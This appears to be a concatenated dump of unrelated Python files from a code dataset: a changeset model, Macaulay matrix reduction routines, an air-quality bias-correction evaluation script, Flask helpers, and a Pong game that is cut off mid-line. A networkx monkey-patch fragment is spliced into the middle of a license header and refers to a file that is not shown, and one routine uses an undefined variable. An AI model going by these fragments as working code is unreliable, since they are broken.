-*-\n#\n# Copyright 2016 Jay Pipes\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
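# The monkey-patching block at the end of graph_networkx.py above contains a
# no-op assignment: `networkx.DiGraph.has_edge = networkx.DiGraph.has_edge`.
# The adjacent Graph alias and the module doctest (`GN.is_edge(v1, v2)` runs
# over directed examples too) show the intended line is:
networkx.DiGraph.is_edge = networkx.DiGraph.has_edge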
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom procession import helpers\nfrom procession.object_defs import base\nfrom procession.object_defs import fields\n\n\nclass Changeset(base.Object):\n \"\"\"\n Represents code that has been proposed for merging into a target branch.\n The changeset has a state, which is a fixed integer value representing\n the status of the changeset in relation to the target branch. Each\n changeset targets one and only one repository.\n \"\"\"\n\n class State(fields.Enum):\n ABANDONED = 0\n DRAFT = 1\n ACTIVE = 5\n CLEARED = 8\n MERGED = 12\n\n CHOICES = {\n ABANDONED: \"Abandoned\",\n DRAFT: \"Draft\",\n ACTIVE: \"Active\",\n CLEARED: \"Cleared\",\n MERGED: \"Merged\",\n }\n\n field_defs = {\n 'uuid': fields.UUID(default=helpers.ordered_uuid),\n 'target_repository': fields.Object('Repository'),\n 'target_branch': fields.AsciiText(),\n 'uploaded_by': fields.Object('User'),\n 'state': State(default=State.ACTIVE),\n 'commit_message': fields.UTF8Text(),\n }\n\n","sub_path":"procession/object_defs/changeset.py","file_name":"changeset.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"158036659","text":"import numpy as np\nimport itertools\nfrom scipy.linalg import qr, solve_triangular, qr_multiply\nfrom numalgsolve.polynomial import Polynomial, MultiCheb, MultiPower\nfrom numalgsolve.utils import row_swap_matrix, MacaulayError, slice_top, mon_combos, \\\n num_mons_full, memoized_all_permutations, mons_ordered, \\\n all_permutations_cheb\n\ndef add_polys(degree, poly, poly_coeff_list):\n \"\"\"Adds polynomials to a Macaulay Matrix.\n\n This function is called on one polynomial and adds all monomial multiples of\n it to the matrix.\n\n Parameters\n ----------\n degree : int\n The degree of the Macaulay Matrix\n poly : Polynomial\n One of the polynomials used to make the matrix.\n poly_coeff_list : list\n A list of all the current polynomials in the matrix.\n Returns\n -------\n poly_coeff_list : list\n The original list of polynomials in the matrix with the new monomial\n multiplications of poly added.\n \"\"\"\n\n poly_coeff_list.append(poly.coeff)\n deg = degree - poly.degree\n dim = poly.dim\n\n mons = mon_combos([0]*dim,deg)\n\n for mon in mons[1:]: #skips the first all 0 mon\n poly_coeff_list.append(poly.mon_mult(mon, returnType = 'Matrix'))\n return poly_coeff_list\n\ndef find_degree(poly_list, verbose=False):\n '''Finds the appropriate degree for the Macaulay Matrix.\n\n Parameters\n --------\n poly_list: list\n The polynomials used to construct the matrix.\n\n Returns\n -----------\n find_degree : int\n The degree of the Macaulay Matrix.\n\n '''\n if verbose:\n print('Degree of Macaulay Matrix:', sum(poly.degree for poly in poly_list) - len(poly_list) + 1)\n return sum(poly.degree for poly in poly_list) - len(poly_list) + 1\n\ndef rrqr_reduceMacaulay(matrix, matrix_terms, cuts, number_of_roots, accuracy = 1.e-10):\n ''' Reduces a Macaulay matrix, BYU style.\n\n The matrix is split into the shape\n A B C\n D E F\n Where A is square and contains all the highest terms, and C contains all the 
x,y,z etc. terms. The lengths\n are determined by the matrix_shape_stuff tuple. First A and D are reduced using rrqr without pivoting, and then the rest of\n the matrix is multiplied by Q.T to change it accordingly. Then E is reduced by rrqr with pivoting, the rows of B are shifted\n accordingly, and F is multipled by Q.T to change it accordingly. This is all done in place to save memory.\n\n Parameters\n ----------\n matrix : numpy array.\n The Macaulay matrix, sorted in BYU style.\n matrix_terms: numpy array\n Each row of the array contains a term in the matrix. The i'th row corresponds to\n the i'th column in the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n Returns\n -------\n matrix : numpy array\n The reduced matrix.\n matrix_terms: numpy array\n The resorted matrix_terms.\n ''' \n #print(\"Starting matrix.shape:\\n\", matrix.shape)\n #RRQR reduces A and D without pivoting sticking the result in it's place.\n Q1,matrix[:,:cuts[0]] = qr(matrix[:,:cuts[0]])\n \n #check if there are zeros along the diagonal of R1\n if any(np.isclose(np.diag(matrix[:,:cuts[0]]),0, atol=accuracy)):\n raise MacaulayError(\"R1 IS NOT FULL RANK\")\n\n #Looks like 0 but not, add to the rank.\n #still_good = np.sum(np.abs(matrix[:,:cuts[0]].diagonal()) < accuracy)\n #if abs(matrix[:,:cuts[0]].diagonal()[-1]) < accuracy:\n # print(matrix[:,:cuts[0]].diagonal())\n # raise MacaulayError(\"HIGHEST NOT FULL RANK\")\n\n #Multiplying the rest of the matrix by Q.T\n matrix[:,cuts[0]:] = Q1.T@matrix[:,cuts[0]:]\n Q1 = 0 #Get rid of Q1 for memory purposes.\n\n #RRQR reduces E sticking the result in it's place.\n Q,matrix[cuts[0]:,cuts[0]:cuts[1]],P = qr(matrix[cuts[0]:,cuts[0]:cuts[1]], pivoting = True)\n\n #Multiplies F by Q.T.\n matrix[cuts[0]:,cuts[1]:] = Q.T@matrix[cuts[0]:,cuts[1]:]\n Q = 0 #Get rid of Q for memory purposes.\n\n #Shifts the columns of B\n matrix[:cuts[0],cuts[0]:cuts[1]] = matrix[:cuts[0],cuts[0]:cuts[1]][:,P]\n\n #Checks for 0 rows and gets rid of them.\n #rank = np.sum(np.abs(matrix.diagonal())>accuracy) + still_good\n #matrix = matrix[:rank]\n\n #eliminates rows we don't care about-- those at the bottom of the matrix\n #since the top corner is a square identity matrix, useful_rows + number_of_roots is the width of the Macaulay matrix\n matrix = row_swap_matrix(matrix)\n for row in matrix[::-1]:\n if np.allclose(row, 0):\n matrix = matrix[:-1]\n else:\n break\n #print(\"Final matrix.shape:\\n\", matrix.shape)\n #useful_rows = matrix.shape[1] - number_of_roots\n #matrix = matrix[:useful_rows,:]\n\n #set very small values in the matrix to zero before backsolving\n matrix[np.isclose(matrix, 0, atol=accuracy)] = 0\n\n #Resorts the matrix_terms.\n matrix_terms[cuts[0]:cuts[1]] = matrix_terms[cuts[0]:cuts[1]][P]\n #print(\"Macaulay1Rank:\", np.sum(np.abs(matrix.diagonal())>accuracy)) \n \n return matrix, matrix_terms\n\ndef rrqr_reduceMacaulay2(matrix, matrix_terms, cuts, number_of_roots, accuracy = 1.e-10):\n ''' Reduces a Macaulay matrix, BYU style\n\n This function does the same thing as rrqr_reduceMacaulay but uses\n qr_multiply instead of qr and a multiplication\n to make the function faster and more memory efficient.\n\n This function only works properly if the bottom left (D) part of the matrix is zero\n\n Parameters\n ----------\n matrix : numpy array.\n The Macaulay matrix, sorted in BYU style.\n matrix_terms: numpy array\n Each row of the array contains a term in the matrix. 
The i'th row corresponds to\n the i'th column in the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n accuracy : float\n What is determined to be 0.\n Returns\n -------\n matrix : numpy array\n The reduced matrix.\n matrix_terms: numpy array\n The resorted matrix_terms.\n '''\n #print(\"Starting matrix.shape:\\n\", matrix.shape)\n #RRQR reduces A and D without pivoting sticking the result in it's place.\n C1,matrix[:cuts[0],:cuts[0]] = qr_multiply(matrix[:,:cuts[0]], matrix[:,cuts[0]:].T, mode = 'right')\n matrix[:cuts[0],cuts[0]:] = C1.T\n C1 = 0\n\n #check if there are zeros along the diagonal of R1\n if any(np.isclose(np.diag(matrix[:,:cuts[0]]),0, atol=accuracy)):\n raise MacaulayError(\"R1 IS NOT FULL RANK\")\n\n #if abs(matrix[:,:cuts[0]].diagonal()[-1]) < accuracy:\n # raise MacaulayError(\"HIGHEST NOT FULL RANK\")\n\n #set small values to zero before backsolving\n matrix[np.isclose(matrix, 0, atol=accuracy)] = 0\n\n matrix[:cuts[0],cuts[0]:] = solve_triangular(matrix[:cuts[0],:cuts[0]],matrix[:cuts[0],cuts[0]:])\n matrix[:cuts[0],:cuts[0]] = np.eye(cuts[0])\n matrix[cuts[0]:,cuts[0]:] -= (matrix[cuts[0]:,:cuts[0]])@matrix[:cuts[0],cuts[0]:] #?\n\n C,R,P = qr_multiply(matrix[cuts[0]:,cuts[0]:cuts[1]], matrix[cuts[0]:,cuts[1]:].T, mode = 'right', pivoting = True)\n\n matrix = matrix[:R.shape[0]+cuts[0]]\n #matrix[cuts[0]:,:cuts[0]] = np.zeros_like(matrix[cuts[0]:,:cuts[0]])\n matrix[cuts[0]:,cuts[0]:cuts[0]+R.shape[1]] = R\n matrix[cuts[0]:,cuts[0]+R.shape[1]:] = C.T\n C,R = 0,0\n\n #Shifts the columns of B.\n matrix[:cuts[0],cuts[0]:cuts[1]] = matrix[:cuts[0],cuts[0]:cuts[1]][:,P]\n matrix_terms[cuts[0]:cuts[1]] = matrix_terms[cuts[0]:cuts[1]][P]\n P = 0\n\n # Check if there are no solutions\n #rank = np.sum(np.abs(matrix.diagonal())>accuracy)\n\n # extra_block = matrix[rank:, -matrix_shape_stuff[2]:]\n # Q,R = qr(extra_block)\n # if np.sum(np.abs(R.diagonal())>accuracy) == matrix_shape_stuff[2]:\n # raise ValueError(\"The system given has no roots.\")\n\n #Get rid of 0 rows at the bottom.\n #matrix = matrix[:rank]\n\n #eliminates rows we don't care about-- those at the bottom of the matrix\n #since the top corner is a square identity matrix, always_useful_rows + number_of_roots is the width of the Macaulay matrix\n always_useful_rows = matrix.shape[1] - number_of_roots\n #matrix = matrix[:useful_rows,:]\n\n #set small values in the matrix to zero now, after the QR reduction\n matrix[np.isclose(matrix, 0, atol=accuracy)] = 0\n #eliminate zero rows from the bottom of the matrix. Zero rows above\n #nonzero elements are not eliminated. This saves time since Macaulay matrices\n #we deal with are only zero at the very bottom\n matrix = row_swap_matrix(matrix)\n for row in matrix[::-1]:\n if np.allclose(row, 0):\n matrix = matrix[:-1]\n else:\n break\n\n return matrix, matrix_terms\n\ndef rrqr_reduceMacaulayFullRank(matrix, matrix_terms, cuts, accuracy = 1.e-10):\n ''' Reduces a Macaulay matrix, BYU style.\n\n This function does the same thing as rrqr_reduceMacaulay2 but only works if the matrix is full rank AND if\n the top left corner (the square of side length cut[0]) is invertible.\n In this case it is faster.\n\n Parameters\n ----------\n matrix : numpy array.\n The Macaulay matrix, sorted in BYU style.\n matrix_terms: numpy array\n Each row of the array contains a term in the matrix. 
The i'th row corresponds to\n the i'th column in the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. These numbers indicate\n where those cuts happen.\n accuracy : float\n What is determined to be 0.\n Returns\n -------\n matrix : numpy array\n The reduced matrix.\n matrix_terms: numpy array\n The resorted matrix_terms.\n '''\n C1,matrix[:cuts[0],:cuts[0]] = qr_multiply(matrix[:cuts[0],:cuts[0]],\\\n matrix[:cuts[0],cuts[0]:].T, mode = 'right')\n matrix[:cuts[0],cuts[0]:] = C1.T\n C1 = 0\n\n #check if there are zeros along the diagonal of R1\n if any(np.isclose(np.diag(matrix[:,:cuts[0]]),0, atol=accuracy)):\n raise MacaulayError(\"R1 IS NOT FULL RANK\")\n\n #if abs(matrix[:,:cuts[0]].diagonal()[-1]) < accuracy:\n # raise MacaulayError(\"HIGHEST NOT FULL RANK\")\n\n C,matrix[cuts[0]:,cuts[0]:cuts[1]],P = qr_multiply(matrix[cuts[0]:,cuts[0]:cuts[1]],\\\n matrix[cuts[0]:,cuts[1]:].T, mode = 'right', pivoting = True)\n\n matrix[cuts[0]:,cuts[1]:] = C.T\n C = 0\n\n #Shifts the columns of B.\n matrix[:cuts[0],cuts[0]:cuts[1]] = matrix[:cuts[0],cuts[0]:cuts[1]][:,P]\n matrix_terms[cuts[0]:cuts[1]] = matrix_terms[cuts[0]:cuts[1]][P]\n P = 0\n return matrix, matrix_terms\n\ndef checkEqual(lst):\n '''Helper function for createMatrixFast. Checks if each element in a list is the same.\n\n Parameters\n ----------\n lst : list\n The list of interest.\n Returns\n -------\n checkEqual : bool\n True if each element in the list is the same. False otherwise.\n '''\n return lst.count(lst[0]) == len(lst)\n\ndef get_ranges(nums):\n '''Helper function for createMatrixFast. Finds where to slice the different parts of the matrix into.\n\n This is in an effort to avoid row_swap_matrix which can be slow. Instead, as we are buiding the part of the\n matrix corresponding to each polynomial seperately, this tells us where each part should go in the whole matrix.\n\n Parameters\n ----------\n nums : list\n The Macualay matrix degree minus the polynomial degrees for for each polynomial.\n Returns\n -------\n ranges : list\n The rows in the Macaulay Matrix that the given polynomail will be sliced into.\n '''\n ranges = []\n for i in nums:\n ranges.append(np.array([],dtype=int))\n start = 0\n count = 0\n n = len(nums)\n for num in nums:\n spot = count\n for r in ranges[count:]:\n r = np.hstack((r,np.arange(start,start+(n-count)*(num-len(r)),n-count)))\n ranges[spot] = r\n start+=1\n spot += 1\n start = ranges[-1][-1]+1\n count+=1\n return ranges\n\ndef createMatrixFast(polys, degree, dim):\n ''' Builds a Macaulay matrix using fast construction.\n\n Parameters\n ----------\n poly_coeffs : list.\n Contains numpy arrays that hold the coefficients of the polynomials to be put in the matrix.\n degree : int\n The degree of the Macaulay Matrix\n dim : int\n The dimension of the polynomials going into the matrix.\n Returns\n -------\n matrix : 2D numpy array\n The Macaulay matrix.\n matrix_terms : numpy array\n The ith row is the term represented by the ith column of the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. 
These numbers indicate\n where those cuts happen.\n '''\n bigShape = [degree+1]*dim\n\n matrix_terms, cuts = sorted_matrix_terms(degree, dim)\n columns = len(matrix_terms)\n\n range_split = [num_mons_full(degree-poly.degree,dim) for poly in polys]\n rows = np.sum(range_split)\n ranges = get_ranges(range_split) #How to slice the poly into the matrix rows.\n matrix = np.zeros((rows,columns))\n curr = 0\n\n #Get the slices needed to pull the matrix_terms from the coeff matrix.\n matrix_term_indexes = list()\n for row in matrix_terms.T:\n matrix_term_indexes.append(row)\n\n permutations = None\n currentDegree = 2\n #Adds the poly_coeffs to flat_polys, using added_zeros to make sure every term is in there.\n added_zeros = np.zeros(bigShape)\n\n for poly,matrix_range in zip(polys,ranges):\n slices = slice_top(poly.coeff)\n added_zeros[slices] = poly.coeff\n array = added_zeros[matrix_term_indexes]\n added_zeros[slices] = np.zeros_like(poly.coeff)\n\n permutations = memoized_all_permutations(degree - poly.degree, dim, degree, permutations, currentDegree)\n currentDegree = degree - poly.degree\n permList = list(permutations.values())\n\n temp = array[np.reshape(permList, (len(permList), columns))[::-1]]\n matrix[matrix_range] = temp\n\n if matrix_shape_stuff[0] > matrix.shape[0]: #The matrix isn't tall enough, these can't all be pivot columns.\n raise MacaulayError(\"HIGHEST NOT FULL RANK. TRY HIGHER DEGREE\")\n #Sorts the rows of the matrix so it is close to upper triangular.\n if not checkEqual([poly.degree for poly in polys]): #Will need some switching possibly if some degrees are different.\n matrix = row_swap_matrix(matrix)\n return matrix, matrix_terms, cuts\n\ndef construction(polys, degree, dim):\n ''' Builds a Macaulay matrix using fast construction in the Chebyshev basis.\n\n Parameters\n ----------\n polys : list.\n Contains numpy arrays that hold the coefficients of the polynomials to be put in the matrix.\n degree : int\n The degree of the Macaulay Matrix\n dim : int\n The dimension of the polynomials going into the matrix.\n Returns\n -------\n matrix : 2D numpy array\n The Macaulay matrix.\n matrix_terms : numpy array\n The ith row is the term represented by the ith column of the matrix.\n cuts : tuple\n When the matrix is reduced it is split into 3 parts with restricted pivoting. 
These numbers indicate\n where those cuts happen.\n '''\n bigShape = [degree+1]*dim\n matrix_terms, cuts = sorted_matrix_terms(degree, dim)\n #print(matrix_shape_stuff)\n matrix_term_indexes = list()\n for row in matrix_terms.T:\n matrix_term_indexes.append(row)\n\n permutations = all_permutations_cheb(degree - np.min([poly.degree for poly in polys]), dim, degree)\n #print(permutations)\n added_zeros = np.zeros(bigShape)\n flat_polys = list()\n i = 0;\n for poly in polys:\n slices = slice_top(poly.coeff)\n added_zeros[slices] = poly.coeff\n array = added_zeros[matrix_term_indexes]\n added_zeros[slices] = np.zeros_like(poly.coeff)\n #print(array)\n\n #flat_polys.append(array[np.vstack(permutations.values())])\n degreeNeeded = degree - poly.degree\n mons = mons_ordered(dim,degreeNeeded)\n mons = np.pad(mons, (0,1), 'constant', constant_values = i)\n i += 1\n flat_polys.append(array)\n for mon in mons[1:-1]:\n result = np.copy(array)\n for i in range(dim):\n if mon[i] != 0:\n\n mult = [0]*dim\n mult[i] = mon[i]\n result = np.sum(result[permutations[tuple(mult)]], axis = 0)\n flat_polys.append(result)\n #print(flat_polys)\n matrix = np.vstack(flat_polys)\n if matrix_shape_stuff[0] > matrix.shape[0]: #The matrix isn't tall enough, these can't all be pivot columns.\n raise MacaulayError(\"HIGHEST NOT FULL RANK. TRY HIGHER DEGREE\")\n matrix = row_swap_matrix(matrix)\n #print(matrix)\n return matrix, matrix_terms, cuts\n","sub_path":"numalgsolve/MacaulayReduce.py","file_name":"MacaulayReduce.py","file_ext":"py","file_size_in_byte":17132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129488860","text":"import numpy as np\r\nfrom sklearn import preprocessing\r\nimport math\r\nfrom sklearn import metrics\r\nfrom tensorflow.keras.models import load_model\r\n\r\ndata = np.load(\"D:/project/data/BTH/dataset_BTH.npy\") #(61, 363, 43)\r\ndataset_all = data.reshape((-1,43)) #(22143, 43)\r\n\r\nvar_dict = {'PM2.5_Bias':0, 'PM10_Bias':1, 'NO2_Bias':2, 'SO2_Bias':3, 'O3_Bias':4, 'CO_Bias':5, 'PM2.5_Obs':6, 'PM10_Obs':7, 'NO2_Obs':8, 'SO2_Obs':9, 'O3_Obs':10, 'CO_Obs':11, 'PM2.5_Sim':12, 'PM10_Sim':13, 'NO2_Sim':14, 'SO2_Sim':15, 'O3_Sim':16, 'CO_Sim':17, 'RH_Bias':18, 'TEM_Bias':19, 'WSPD_Bias':20, 'WDIR_Bias':21, 'PRE_Bias':22, 'RH_Obs':23, 'TEM_Obs':24, 'WSPD_Obs':25, 'WDIR_Obs':26, 'PRE_Obs':27, 'PBLH_Sim':28, 'SOLRAD_Sim':29, 'RH_Sim':30, 'TEM_Sim':31, 'WSPD_Sim':32, 'WDIR_Sim':33, 'PRE_Sim':34, 'PM2.5_Bias_ystd':35, 'NO2_Bias_ystd':36, 'RH_Bias_ystd':37, 'O3_Bias_ystd':38, 'SO2_Bias_ystd':39, 'WSPD_Bias_ystd':40, 'NO2_Obs_ystd':41, 'O3_Obs_ystd':42}\r\n\r\nvar_sele = ['PM2.5_Sim','PM2.5_Bias_ystd','NO2_Bias','SO2_Bias','O3_Bias','NO2_Obs','SO2_Obs','O3_Obs','RH_Bias','TEM_Bias','WDIR_Bias','WSPD_Bias','PRE_Bias','RH_Obs','TEM_Obs','WSPD_Obs','PRE_Obs','PBLH_Sim','SOLRAD_Sim']\r\n#standardization: scaler of dataset_all\r\nY_all = dataset_all[:,0].reshape((dataset_all.shape[0],1))\r\nX_all = np.zeros((len(dataset_all),len(var_sele)))\r\ni = 0\r\nfor var in var_sele:\r\n X_all[:,i] = dataset_all[:,var_dict.get(var)]\r\n i += 1\r\nscaler1 = preprocessing.StandardScaler().fit(X_all)\r\nscaler2 = preprocessing.StandardScaler().fit(Y_all)\r\nX_all = scaler1.transform(X_all)\r\nY_all = scaler2.transform(Y_all) #(15972, 1)\r\n\r\n#prepare x & y dataset\r\ndef get_xy_dataset(input_dataset):\r\n global scaler1, scaler2 \r\n Y = input_dataset[:,0] #'PM2.5_Bias'\r\n X = np.zeros((len(input_dataset),len(var_sele)))\r\n i = 0\r\n for var in var_sele:\r\n X[:,i] 
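# Both createMatrixFast and construction above guard with
# `if matrix_shape_stuff[0] > matrix.shape[0]:`, but neither function defines
# matrix_shape_stuff (the name survives only in comments from an older
# signature), so as written the check raises NameError instead of the intended
# MacaulayError. The rest of the module calls the same quantity `cuts`, so the
# guard should presumably read:
if cuts[0] > matrix.shape[0]:  # not enough rows for all highest-degree columns to pivot
    raise MacaulayError("HIGHEST NOT FULL RANK. TRY HIGHER DEGREE")
# construction also reuses `i` as both its polynomial counter and the inner
# `for i in range(dim)` loop variable, so the np.pad constant is wrong after
# the first polynomial; renaming the inner loop variable avoids the clash.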
= input_dataset[:,var_dict.get(var)]\r\n i += 1\r\n X = scaler1.transform(X) #标准化\r\n Y = Y.reshape((Y.shape[0],1))\r\n Y = scaler2.transform(Y) #标准化\r\n return X, Y\r\n\r\ndataset_X , dataset_y = get_xy_dataset(dataset_all)\r\n\r\n#load model trained by BTH dataset\r\nmodel = load_model(\"D:/project/data/BTH/DOMAIN_TRANS/DNN_YRD_1.h5\")\r\n\r\n#RMSE\r\ndef cal_rmse(xtest, ytest = None, info = ''):\r\n if ytest is None:\r\n RMSE = math.sqrt(metrics.mean_squared_error(xtest[:,var_dict.get('PM2.5_Obs')], xtest[:,var_dict.get('PM2.5_Sim')]))\r\n else:\r\n y_pred = model.predict(xtest)\r\n y_pred = scaler2.inverse_transform(y_pred) #invers\r\n PM25_revised = ytest[:,var_dict.get('PM2.5_Sim')] - y_pred.reshape(len(xtest),)\r\n RMSE = math.sqrt(metrics.mean_squared_error(ytest[:,var_dict.get('PM2.5_Obs')], PM25_revised))\r\n print(info + ' RMSE: %.3f' % RMSE)\r\n\r\ncal_rmse(dataset_all, info = 'all year')\r\ncal_rmse(dataset_X, dataset_all, 'all year revised')\r\n\r\n#R2\r\ndef cal_R2(xtest, ytest = None, info = ''):\r\n if ytest is None:\r\n u = np.concatenate((xtest[:,var_dict.get('PM2.5_Obs')], xtest[:,var_dict.get('PM2.5_Sim')])).reshape((2,-1))\r\n R2 = np.corrcoef(u)[0,1] ** 2\r\n else:\r\n y_pred = model.predict(xtest)\r\n y_pred = scaler2.inverse_transform(y_pred)\r\n PM25_revised = ytest[:,var_dict.get('PM2.5_Sim')] - y_pred.reshape(len(xtest),)\r\n v = np.concatenate((ytest[:,var_dict.get('PM2.5_Obs')], PM25_revised)).reshape((2,-1))\r\n R2 = np.corrcoef(v)[0,1] ** 2\r\n print(info + ' R2: %.3f' % R2)\r\n\r\ncal_R2(dataset_all, info = 'all year')\r\ncal_R2(dataset_X, dataset_all, 'all year revised')\r\n\r\n#NMB\r\ndef cal_NMB(xtest, ytest = None, info = ''):\r\n if ytest is None:\r\n NMB = np.sum(xtest[:,var_dict.get('PM2.5_Sim')] - xtest[:,var_dict.get('PM2.5_Obs')]) / np.sum(xtest[:,var_dict.get('PM2.5_Obs')])\r\n else:\r\n y_pred = model.predict(xtest)\r\n y_pred = scaler2.inverse_transform(y_pred)\r\n #bias=sim-obs,PM25_revised=sim-bias\r\n PM25_revised = ytest[:,var_dict.get('PM2.5_Sim')] - y_pred.reshape(len(xtest),)\r\n NMB = np.sum(PM25_revised - ytest[:,var_dict.get('PM2.5_Obs')]) / np.sum(ytest[:,var_dict.get('PM2.5_Obs')])\r\n print(info + ' NMB: %.3f' % NMB)\r\n\r\ncal_NMB(dataset_all, info = 'all year')\r\ncal_NMB(dataset_X, dataset_all, 'all year revised')\r\n\r\n","sub_path":"BTH/DOMAIN_TRANS/domain_trans_2.py","file_name":"domain_trans_2.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"71301997","text":"from time import time\nimport sys\nimport logging\nfrom functools import wraps\nfrom flask import Response\nimport rapidjson\nfrom src.business.biz.CallBiz import CallBiz\nfrom src.business.biz.TelephoneBillBiz import TelephoneBillBiz\n\n\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO)\n\n\ndef api_data_return():\n def intern_dec(func):\n @wraps(func)\n def wrapper_decorator(*args, **kwargs):\n start = time()\n data = {\n 'status': 405,\n 'success': False,\n 'execution_time': 0,\n 'message': 'Method Not Allowed',\n 'result': None\n }\n data = func(data)\n data['execution_time'] = time() - start\n return format_json_response(data)\n return wrapper_decorator\n return intern_dec\n\n\ndef format_json_response(data):\n return Response(\n rapidjson.dumps(data),\n status=data['status'],\n mimetype='application/json'\n )\n\n\ndef call_request(data, request, type=None):\n if request.method == 'POST':\n if request.is_json:\n try:\n req_data = request.get_json()\n if 
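# Translations for the non-English comments in the BTH domain-transfer script
# above: `#标准化` means "standardize" (apply the fitted StandardScaler) and
# `#invers` abbreviates "inverse-transform" (map the DNN's prediction back to
# the original bias scale). The round trip those comments describe:
import numpy as np
from sklearn.preprocessing import StandardScaler

scaler = StandardScaler().fit(np.array([[1.0], [2.0], [3.0]]))
z = scaler.transform(np.array([[2.5]]))  # standardize
back = scaler.inverse_transform(z)       # inverse-transform
assert np.allclose(back, 2.5)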
req_data:\n # In case we are calling api start | end endpoints\n if type:\n req_data['type'] = type\n data = CallBiz(req_data, data).save()\n except Exception as e:\n logging.info(e)\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n else:\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n return data\n\n\ndef telephone_bill_request(data, request):\n if request.method in ['GET', 'POST']:\n if request.is_json:\n try:\n req_data = request.get_json()\n if req_data:\n data = TelephoneBillBiz(req_data, data).save()\n except Exception as e:\n logging.info(e)\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n else:\n data['status'] = 406\n data['message'] = 'Not Acceptable : Content type must be application/json'\n return data\n","sub_path":"src/controllers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"318472970","text":"import os, sys, pygame\nfrom random import randint\n\n\nclass Pad(pygame.sprite.Sprite):\n def __init__(self, pos=(0, 0)):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((12, 30)).convert()\n self.image.fill((255, 255, 255))\n self.rect = self.image.get_rect(center=pos)\n self.max_speed = 5\n self.speed = 0\n\n def move_up(self):\n self.speed = self.max_speed * -1\n\n def move_down(self):\n self.speed = self.max_speed * 1\n\n def stop(self):\n self.speed = 0\n\n def update(self):\n self.rect.move_ip(0, self.speed)\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, pos=(0, 0)):\n pygame.sprite.Sprite.__init__(self)\n self.pos = pos\n self.image = pygame.Surface((10, 10)).convert()\n self.image.fill((255, 255, 255))\n self.rect = self.image.get_rect(center=self.pos)\n self.speed_x = 0\n self.speed_y = 0\n\n def change_y(self):\n self.speed_y *= -1\n\n def change_x(self):\n self.speed_x *= -1\n\n def start(self, speed_x, speed_y):\n self.speed_x = speed_x\n self.speed_y = speed_y\n\n def stop(self):\n self.speed_x = 0\n self.speed_y = 0\n\n def reset(self):\n self.rect = self.image.get_rect(center=self.pos)\n\n def update(self):\n self.rect.move_ip(self.speed_x, self.speed_y)\n\n\nclass Score(pygame.sprite.Sprite):\n def __init__(self, font, pos=(0, 0)):\n pygame.sprite.Sprite.__init__(self)\n self.font = font\n self.pos = pos\n self.score = 0\n self.image = self.font.render(str(self.score), 0, (255, 255, 255))\n self.rect = self.image.get_rect(center=self.pos)\n\n def score_up(self):\n self.score += 1\n\n def update(self):\n self.image = self.font.render(str(self.score), 0, (255, 255, 255))\n self.rect = self.image.get_rect(center=self.pos)\n\n\ndef main():\n pygame.init()\n\n size = width, height = 800, 600\n screen = pygame.display.set_mode(size)\n pygame.display.set_caption('Pong Pygame')\n\n try:\n filename = os.path.join(\n os.path.dirname(__file__),\n 'assets',\n 'graphics',\n 'background.png')\n background = pygame.image.load(filename)\n background = background.convert()\n except pygame.error as e:\n print ('Cannot load image: ', filename)\n raise SystemExit(str(e))\n\n pad_left = Pad((width/6, height/4))\n pad_right = Pad((5*width/6, 3*height/4))\n ball = Ball((width/2, height/2))\n\n if not pygame.font:\n raise SystemExit('Pygame does not support fonts')\n\n try:\n filename = os.path.join(\n os.path.dirname(__file__),\n 'assets',\n 'fonts',\n 'wendy.ttf')\n font 
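# call_request and telephone_bill_request above repeat the 406 branch three
# times each, and call_request shadows the built-in name `type` with a
# parameter. A sketch of factoring out the guard; the helper name is mine and
# the response contract is unchanged:
def reject_non_json(request, data):
    # Returns False when the request body can be parsed as JSON; otherwise
    # stamps the shared 406 payload onto `data` and returns True.
    if request.is_json:
        return False
    data['status'] = 406
    data['message'] = 'Not Acceptable : Content type must be application/json'
    return True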
= pygame.font.Font(filename, 90)\n    except pygame.error as e:\n        print('Cannot load font:', filename)\n        raise SystemExit(str(e))\n\n    left_score = Score(font, (width/3, height/8))\n    right_score = Score(font, (2*width/3, height/8))\n\n    sprites = pygame.sprite.Group(\n        pad_left, pad_right, ball, left_score, right_score)\n\n    clock = pygame.time.Clock()\n    fps = 100\n\n    pygame.key.set_repeat(1, 1000 // fps)\n\n    top = pygame.Rect(0, 0, width, 5)\n    bottom = pygame.Rect(0, height-5, width, 5)\n    left = pygame.Rect(0, 0, 5, height)\n    right = pygame.Rect(width-5, 0, 5, height)\n\n    while 1:\n        clock.tick(fps)\n\n        pad_left.stop()\n        pad_right.stop()\n\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                return\n            elif event.type == pygame.KEYDOWN and event.key == pygame.K_w:\n                pad_left.move_up()\n            elif event.type == pygame.KEYDOWN and event.key == pygame.K_s:\n                pad_left.move_down()\n            elif event.type == pygame.KEYDOWN and event.key == pygame.K_UP:\n                pad_right.move_up()\n            elif event.type == pygame.KEYDOWN and event.key == 